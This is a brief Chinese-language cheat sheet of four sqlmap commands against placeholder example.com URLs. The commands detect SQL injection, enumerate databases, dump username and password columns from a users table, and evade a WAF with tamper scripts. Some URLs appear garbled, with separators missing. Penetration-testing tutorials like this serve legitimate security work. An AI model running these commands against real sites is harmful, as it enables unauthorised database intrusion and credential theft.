sqlmap典型使用场景示例 📅 2026/8/13 22:27:46 场景1基础检测与数据库枚举# 检测URL是否存在注入并枚举所有数据库sqlmap.py -u http://example.com/product.php?id123 --dbs场景2指定参数与数据库类型# 仅测试uid参数指定目标为MySQL数据库sqlmap.py -u http://example.com/user.php?id1uid2 -p uid --dbms MySQL场景3导出指定数据# 导出testdb数据库中users表的username和password列sqlmap.py -u http://example.com?id1 -D testdb -T users -C username,password --dump场景4绕过WAF检测# 使用随机User-Agent和空格转注释脚本绕过WAFsqlmap.py -u http://example.com?id1 --random-agent --tamper space2comment.py